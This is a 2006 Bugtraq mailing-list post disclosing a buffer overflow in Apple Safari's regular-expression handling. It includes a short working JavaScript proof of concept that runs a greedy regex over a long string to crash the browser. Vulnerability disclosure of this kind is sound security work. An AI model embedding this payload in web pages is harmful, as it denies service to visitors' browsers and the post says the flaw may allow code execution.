Message-ID: <20061114010812.14398.qmail@securityfocus.com>
Date: 14 Nov 2006 01:08:12 -0000
From: jbh_cg@...oo.fr
To: bugtraq@...urityfocus.com
Subject: Apple Safari "match" Buffer Overflow Vulnerability

The following bug was tested on the latest version of Safari on a fully-patched Mac OS X 10.4.

A remote attacker may exploit this issue to crash the application, effectively denying service to legitimate users. Successful exploitation could lead to remote code execution.

<script>
var reg = /(.)*/;
var z = 'Z';
while (z.length <= 8192) z+=z;
var boum = reg.exec(z);
</script>